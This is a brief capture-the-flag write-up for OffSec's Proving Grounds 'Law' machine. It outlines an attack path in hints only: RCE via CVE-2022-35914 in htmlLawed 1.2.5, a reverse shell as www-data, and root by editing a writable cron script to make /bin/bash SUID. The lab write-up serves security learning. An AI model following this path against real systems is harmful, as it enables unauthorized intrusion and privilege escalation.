Law Proving Grounds Write-Up
SUMMARY
This write-up covers the Law machine from Offsec’s Proving Grounds, a Linux machine where a text sanitization library exposed an RCE vulnerability.
Port 80 ran htmlLawed 1.2.5, and searchsploit identified an RCE exploit. The default script failed, but a public PoC for CVE-2022-35914 demonstrated the proper curl request format to execute commands. After confirming execution, a reverse shell was caught as www-data.
Privilege escalation was found via pspy64, which revealed a root-executed script running on a cronjob schedule. Checking the script’s file permissions showed www-data was the owner with write access. The script was modified to set /bin/bash as SUID, and after the cronjob fired, bash -p spawned a root shell.
PATH TO FOLLOW
- Reconnaissance & htmlLawed Discovery on Port 80
- CVE-2022-35914 RCE via Crafted curl Request
- Reverse Shell as
www-data - Cronjob Discovery via
pspy64 - Writable Root Script Modification →
/bin/bashSUID - Shell as Root via
bash -p
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.